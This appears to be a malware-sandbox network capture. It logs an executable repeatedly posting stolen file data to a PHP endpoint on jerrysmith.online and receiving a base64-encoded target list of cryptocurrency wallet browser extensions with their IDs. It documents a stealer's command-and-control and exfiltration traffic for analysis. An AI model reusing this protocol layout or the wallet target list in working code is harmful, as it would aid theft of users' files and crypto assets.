Mar 22, 2023 11:21:23.426419020 CET	1217	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 35 34 35 62 Data Ascii: ------IECFIEGDBKJKFIDHIECGContent-Disposition: form-data; name="token"ae545ba347d2f14d18f59bfd317c553c888ede9532a8e5cdac5200014617065a0ce8d9d8------IECFIEGDBKJKFIDHIECGContent-Disposition: form-data; name="file_name"ZmlsZXNcUkVDR
Mar 22, 2023 11:21:23.580054998 CET	1217	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 10:21:23 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.5	49703	85.31.45.22	80	C:\Users\user\Desktop\B7VbZC8QLf.exe

Timestamp	kBytes transferred	Direction	Data
Mar 22, 2023 11:21:23.624208927 CET	1218	OUT	POST /410b5129171f10ea.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KECBGCGCGIEGCBFHIIEB Host: jerrysmith.online Content-Length: 1747 Connection: Keep-Alive Cache-Control: no-cache
Mar 22, 2023 11:21:23.624311924 CET	1219	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 43 42 47 43 47 43 47 49 45 47 43 42 46 48 49 49 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 35 34 35 62 Data Ascii: ------KECBGCGCGIEGCBFHIIEBContent-Disposition: form-data; name="token"ae545ba347d2f14d18f59bfd317c553c888ede9532a8e5cdac5200014617065a0ce8d9d8------KECBGCGCGIEGCBFHIIEBContent-Disposition: form-data; name="file_name"ZmlsZXNcUkVDR
Mar 22, 2023 11:21:23.771796942 CET	1220	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 10:21:23 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.5	49704	85.31.45.22	80	C:\Users\user\Desktop\B7VbZC8QLf.exe

Timestamp	kBytes transferred	Direction	Data
Mar 22, 2023 11:21:23.811414957 CET	1220	OUT	POST /410b5129171f10ea.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKJKKJJKJEGIECAKJJEB Host: jerrysmith.online Content-Length: 1747 Connection: Keep-Alive Cache-Control: no-cache
Mar 22, 2023 11:21:23.811491966 CET	1222	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 4b 4a 4a 4b 4a 45 47 49 45 43 41 4b 4a 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 35 34 35 62 Data Ascii: ------KKJKKJJKJEGIECAKJJEBContent-Disposition: form-data; name="token"ae545ba347d2f14d18f59bfd317c553c888ede9532a8e5cdac5200014617065a0ce8d9d8------KKJKKJJKJEGIECAKJJEBContent-Disposition: form-data; name="file_name"ZmlsZXNcUkVDR
Mar 22, 2023 11:21:23.959517956 CET	1222	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 10:21:23 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.5	49705	85.31.45.22	80	C:\Users\user\Desktop\B7VbZC8QLf.exe

Timestamp	kBytes transferred	Direction	Data
Mar 22, 2023 11:21:23.997498989 CET	1223	OUT	POST /410b5129171f10ea.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJKKFIJKFCAKJJJKJKFI Host: jerrysmith.online Content-Length: 1747 Connection: Keep-Alive Cache-Control: no-cache
Mar 22, 2023 11:21:23.997612953 CET	1225	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 4b 4b 46 49 4a 4b 46 43 41 4b 4a 4a 4a 4b 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 35 34 35 62 Data Ascii: ------HJKKFIJKFCAKJJJKJKFIContent-Disposition: form-data; name="token"ae545ba347d2f14d18f59bfd317c553c888ede9532a8e5cdac5200014617065a0ce8d9d8------HJKKFIJKFCAKJJJKJKFIContent-Disposition: form-data; name="file_name"ZmlsZXNcUkVDR
Mar 22, 2023 11:21:24.179054976 CET	1225	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 10:21:24 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.5	49706	85.31.45.22	80	C:\Users\user\Desktop\B7VbZC8QLf.exe

Timestamp	kBytes transferred	Direction	Data
Mar 22, 2023 11:21:24.231715918 CET	1226	OUT	POST /410b5129171f10ea.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFIECFIJDAAKEBGCGHIE Host: jerrysmith.online Content-Length: 1747 Connection: Keep-Alive Cache-Control: no-cache
Mar 22, 2023 11:21:24.231774092 CET	1227	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 46 49 45 43 46 49 4a 44 41 41 4b 45 42 47 43 47 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 35 34 35 62 Data Ascii: ------CFIECFIJDAAKEBGCGHIEContent-Disposition: form-data; name="token"ae545ba347d2f14d18f59bfd317c553c888ede9532a8e5cdac5200014617065a0ce8d9d8------CFIECFIJDAAKEBGCGHIEContent-Disposition: form-data; name="file_name"ZmlsZXNcUkVDR
Mar 22, 2023 11:21:24.381699085 CET	1228	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 10:21:24 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.5	49707	85.31.45.22	80	C:\Users\user\Desktop\B7VbZC8QLf.exe

Timestamp	kBytes transferred	Direction	Data
Mar 22, 2023 11:21:24.420434952 CET	1228	OUT	POST /410b5129171f10ea.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IECFIEGDBKJKFIDHIECG Host: jerrysmith.online Content-Length: 1747 Connection: Keep-Alive Cache-Control: no-cache
Mar 22, 2023 11:21:24.420434952 CET	1230	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 35 34 35 62 Data Ascii: ------IECFIEGDBKJKFIDHIECGContent-Disposition: form-data; name="token"ae545ba347d2f14d18f59bfd317c553c888ede9532a8e5cdac5200014617065a0ce8d9d8------IECFIEGDBKJKFIDHIECGContent-Disposition: form-data; name="file_name"ZmlsZXNcUkVDR
Mar 22, 2023 11:21:24.600121021 CET	1230	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 10:21:24 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.5	49708	85.31.45.22	80	C:\Users\user\Desktop\B7VbZC8QLf.exe

Timestamp	kBytes transferred	Direction	Data
Mar 22, 2023 11:21:24.632407904 CET	1231	OUT	POST /410b5129171f10ea.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KECBGCGCGIEGCBFHIIEB Host: jerrysmith.online Content-Length: 1747 Connection: Keep-Alive Cache-Control: no-cache
Mar 22, 2023 11:21:24.632481098 CET	1233	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 43 42 47 43 47 43 47 49 45 47 43 42 46 48 49 49 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 35 34 35 62 Data Ascii: ------KECBGCGCGIEGCBFHIIEBContent-Disposition: form-data; name="token"ae545ba347d2f14d18f59bfd317c553c888ede9532a8e5cdac5200014617065a0ce8d9d8------KECBGCGCGIEGCBFHIIEBContent-Disposition: form-data; name="file_name"ZmlsZXNcUkVDR
Mar 22, 2023 11:21:24.788604975 CET	1233	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 10:21:24 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.5	49709	85.31.45.22	80	C:\Users\user\Desktop\B7VbZC8QLf.exe

Timestamp	kBytes transferred	Direction	Data
Mar 22, 2023 11:21:24.843434095 CET	1234	OUT	POST /410b5129171f10ea.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKJKKJJKJEGIECAKJJEB Host: jerrysmith.online Content-Length: 1747 Connection: Keep-Alive Cache-Control: no-cache
Mar 22, 2023 11:21:24.843523979 CET	1236	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 4b 4a 4a 4b 4a 45 47 49 45 43 41 4b 4a 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 35 34 35 62 Data Ascii: ------KKJKKJJKJEGIECAKJJEBContent-Disposition: form-data; name="token"ae545ba347d2f14d18f59bfd317c553c888ede9532a8e5cdac5200014617065a0ce8d9d8------KKJKKJJKJEGIECAKJJEBContent-Disposition: form-data; name="file_name"ZmlsZXNcUkVDR
Mar 22, 2023 11:21:24.993150949 CET	1236	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 10:21:24 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49692	85.31.45.22	80	C:\Users\user\Desktop\B7VbZC8QLf.exe

Timestamp	kBytes transferred	Direction	Data
Mar 22, 2023 11:21:18.044660091 CET	4	OUT	POST /410b5129171f10ea.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAFBFCBGHDGCFHJJECAF Host: jerrysmith.online Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 41 46 42 46 43 42 47 48 44 47 43 46 48 4a 4a 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 35 34 35 62 61 33 34 37 64 32 66 31 34 64 31 38 66 35 39 62 66 64 33 31 37 63 35 35 33 63 38 38 38 65 64 65 39 35 33 32 61 38 65 35 63 64 61 63 35 32 30 30 30 31 34 36 31 37 30 36 35 61 30 63 65 38 64 39 64 38 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 42 46 43 42 47 48 44 47 43 46 48 4a 4a 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 42 46 43 42 47 48 44 47 43 46 48 4a 4a 45 43 41 46 2d 2d 0d 0a Data Ascii: ------BAFBFCBGHDGCFHJJECAFContent-Disposition: form-data; name="token"ae545ba347d2f14d18f59bfd317c553c888ede9532a8e5cdac5200014617065a0ce8d9d8------BAFBFCBGHDGCFHJJECAFContent-Disposition: form-data; name="message"plugins------BAFBFCBGHDGCFHJJECAF--
Mar 22, 2023 11:21:18.175226927 CET	6	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 10:21:18 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 5056 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d 5a 75 59 6d 56 73 5a 6d 52 76 5a 57 6c 76 61 47 56 75 61 32 70 70 59 6d 35 74 59 57 52 71 61 57 56 6f 61 6d 68 68 61 6d 4a 38 4d 58 77 77 66 44 42 38 51 32 39 70 62 6d 4a 68 63 32 55 67 56 32 46 73 62 47 56 30 49 47 56 34 64 47 56 75 63 32 6c 76 62 6e 78 6f 62 6d 5a 68 62 6d 74 75 62 32 4e 6d 5a 57 39 6d 59 6d 52 6b 5a 32 4e 70 61 6d 35 74 61 47 35 6d 62 6d 74 6b 62 6d 46 68 5a 48 77 78 66 44 42 38 4d 58 78 48 64 57 46 79 5a 47 46 38 61 48 42 6e 62 47 5a 6f 5a 32 5a 75 61 47 4a 6e 63 47 70 6b 5a 57 35 71 5a 32 31 6b 5a 32 39 6c 61 57 46 77 63 47 46 6d 62 47 35 38 4d 58 77 77 66 44 42 38 53 6d 46 34 65 43 42 4d 61 57 4a 6c 63 6e 52 35 66 47 4e 71 5a 57 78 6d 63 47 78 77 62 47 56 69 5a 47 70 71 5a 57 35 73 62 48 42 71 59 32 4a 73 62 57 70 72 5a 6d 4e 6d 5a 6d 35 6c 66 44 46 38 4d 48 77 77 66 47 6c 58 59 57 78 73 5a 58 52 38 61 32 35 6a 59 32 68 6b 61 57 64 76 59 6d 64 6f 5a 57 35 69 59 6d 46 6b 5a 47 39 71 61 6d 35 75 59 57 39 6e 5a 6e 42 77 5a 6d 70 38 4d 58 77 77 66 44 42 38 54 55 56 58 49 45 4e 59 66 47 35 73 59 6d 31 75 62 6d 6c 71 59 32 35 73 5a 57 64 72 61 6d 70 77 59 32 5a 71 59 32 78 74 59 32 5a 6e 5a 32 5a 6c 5a 6d 52 74 66 44 46 38 4d 48 77 77 66 45 64 31 61 57 78 6b 56 32 46 73 62 47 56 30 66 47 35 68 62 6d 70 74 5a 47 74 75 61 47 74 70 62 6d 6c 6d 62 6d 74 6e 5a 47 4e 6e 5a 32 4e 6d 62 6d 68 6b 59 57 46 74 62 57 31 71 66 44 46 38 4d 48 77 77 66 46 4a 76 62 6d 6c 75 49 46 64 68 62 47 78 6c 64 48 78 6d 62 6d 70 6f 62 57 74 6f 61 47 31 72 59 6d 70 72 61 32 46 69 62 6d 52 6a 62 6d 35 76 5a 32 46 6e 62 32 64 69 62 6d 56 6c 59 33 77 78 66 44 42 38 4d 48 78 4f 5a 57 39 4d 61 57 35 6c 66 47 4e 77 61 47 68 73 5a 32 31 6e 59 57 31 6c 62 32 52 75 61 47 74 71 5a 47 31 72 63 47 46 75 62 47 56 73 62 6d 78 76 61 47 46 76 66 44 46 38 4d 48 77 77 66 45 4e 4d 56 69 42 58 59 57 78 73 5a 58 52 38 62 6d 68 75 61 32 4a 72 5a 32 70 70 61 32 64 6a 61 57 64 68 5a 47 39 74 61 33 42 6f 59 57 78 68 62 6d 35 6b 59 32 46 77 61 6d 74 38 4d 58 77 77 66 44 42 38 54 47 6c 78 64 57 46 73 61 58 52 35 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 64 68 62 47 Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbG
Mar 22, 2023 11:21:18.175307035 CET	7	IN	Data Raw: 78 6c 64 48 78 68 61 57 6c 6d 59 6d 35 69 5a 6d 39 69 63 47 31 6c 5a 57 74 70 63 47 68 6c 5a 57 6c 71 61 57 31 6b 63 47 35 73 63 47 64 77 63 48 77 78 66 44 42 38 4d 48 78 4c 5a 58 42 73 63 6e 78 6b 62 57 74 68 62 57 4e 72 62 6d 39 6e 61 32 64 6a Data Ascii: xldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBkb
Mar 22, 2023 11:21:18.175535917 CET	8	IN	Data Raw: 56 32 46 73 62 47 56 30 66 47 4a 6f 61 47 68 73 59 6d 56 77 5a 47 74 69 59 58 42 68 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48 77 77 66 45 4e 35 59 57 35 76 49 46 64 68 62 47 78 6c 64 48 78 6b 61 32 Data Ascii: V2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF
Mar 22, 2023 11:21:18.175585985 CET	10	IN	Data Raw: 5a 76 61 58 42 77 59 6d 64 6a 61 6d 56 77 62 6d 68 70 59 6d 78 68 61 57 4a 6a 62 6d 4e 73 5a 32 74 38 4d 58 77 77 66 44 42 38 52 6d 6c 75 62 6d 6c 6c 66 47 4e 71 62 57 74 75 5a 47 70 6f 62 6d 46 6e 59 32 5a 69 63 47 6c 6c 62 57 35 72 5a 48 42 76 Data Ascii: ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoY
Mar 22, 2023 11:21:18.175627947 CET	10	IN	Data Raw: 62 47 39 75 59 32 5a 75 59 6d 56 72 59 32 4e 70 62 6d 68 68 63 47 52 69 66 44 46 38 4d 48 77 77 66 45 39 77 5a 58 4a 68 49 46 64 68 62 47 78 6c 64 48 78 6e 62 32 70 6f 59 32 52 6e 59 33 42 69 63 47 5a 70 5a 32 4e 68 5a 57 70 77 5a 6d 68 6d 5a 57 Data Ascii: bG9uY2ZuYmVrY2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXw=

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.2.5	49710	85.31.45.22	80	C:\Users\user\Desktop\B7VbZC8QLf.exe

Timestamp	kBytes transferred	Direction	Data
Mar 22, 2023 11:21:25.052685976 CET	1237	OUT	POST /410b5129171f10ea.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAFBFCBGHDGCFHJJECAF Host: jerrysmith.online Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Mar 22, 2023 11:21:25.052767992 CET	1238	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 41 46 42 46 43 42 47 48 44 47 43 46 48 4a 4a 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 35 34 35 62 Data Ascii: ------BAFBFCBGHDGCFHJJECAFContent-Disposition: form-data; name="token"ae545ba347d2f14d18f59bfd317c553c888ede9532a8e5cdac5200014617065a0ce8d9d8------BAFBFCBGHDGCFHJJECAFContent-Disposition: form-data; name="file_name"ZmlsZXNcRE9DU
Mar 22, 2023 11:21:25.207897902 CET	1239	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 10:21:25 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.2.5	49711	85.31.45.22	80	C:\Users\user\Desktop\B7VbZC8QLf.exe

Timestamp	kBytes transferred	Direction	Data
Mar 22, 2023 11:21:25.266721964 CET	1239	OUT	POST /410b5129171f10ea.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIDAKFIJJKJJJKEBKJEH Host: jerrysmith.online Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Mar 22, 2023 11:21:25.266778946 CET	1241	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 35 34 35 62 Data Ascii: ------HIDAKFIJJKJJJKEBKJEHContent-Disposition: form-data; name="token"ae545ba347d2f14d18f59bfd317c553c888ede9532a8e5cdac5200014617065a0ce8d9d8------HIDAKFIJJKJJJKEBKJEHContent-Disposition: form-data; name="file_name"ZmlsZXNcRE9DU
Mar 22, 2023 11:21:25.448540926 CET	1241	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 10:21:25 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.2.5	49712	85.31.45.22	80	C:\Users\user\Desktop\B7VbZC8QLf.exe

Timestamp	kBytes transferred	Direction	Data
Mar 22, 2023 11:21:25.486253977 CET	1242	OUT	POST /410b5129171f10ea.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAFIDGCFHIEHJJJJECAK Host: jerrysmith.online Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Mar 22, 2023 11:21:25.486335993 CET	1244	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 41 46 49 44 47 43 46 48 49 45 48 4a 4a 4a 4a 45 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 35 34 35 62 Data Ascii: ------AAFIDGCFHIEHJJJJECAKContent-Disposition: form-data; name="token"ae545ba347d2f14d18f59bfd317c553c888ede9532a8e5cdac5200014617065a0ce8d9d8------AAFIDGCFHIEHJJJJECAKContent-Disposition: form-data; name="file_name"ZmlsZXNcRE9DU
Mar 22, 2023 11:21:25.640055895 CET	1244	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 10:21:25 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	192.168.2.5	49713	85.31.45.22	80	C:\Users\user\Desktop\B7VbZC8QLf.exe

Timestamp	kBytes transferred	Direction	Data
Mar 22, 2023 11:21:25.687057972 CET	1245	OUT	POST /410b5129171f10ea.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCAFIJJJKEGIECAKKEHI Host: jerrysmith.online Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Mar 22, 2023 11:21:25.687057972 CET	1247	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 35 34 35 62 Data Ascii: ------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="token"ae545ba347d2f14d18f59bfd317c553c888ede9532a8e5cdac5200014617065a0ce8d9d8------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="file_name"ZmlsZXNcRE9DU
Mar 22, 2023 11:21:25.836719990 CET	1247	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 10:21:25 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

